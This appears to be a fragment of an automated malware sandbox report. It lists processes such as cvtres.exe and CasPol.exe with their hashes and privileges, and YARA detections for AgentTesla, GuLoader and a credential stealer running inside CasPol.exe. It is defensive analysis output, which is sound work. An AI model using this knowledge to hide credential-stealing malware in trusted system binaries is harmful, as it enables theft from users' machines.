                        MD5 hash:350C52F71BDED7B99668585C15D70EEA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:moderate

                        Target ID:8
                        Start time:11:06:44
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
                        Imagebase:0x13d0000
                        File size:43176 bytes
                        MD5 hash:C09985AE74F0882F208D75DE27770DFA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:10
                        Start time:11:07:38
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                        Imagebase:0xf70000
                        File size:106496 bytes
                        MD5 hash:827875A7EE6003FC7F5301C613A2BB1C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate

                        No disassembly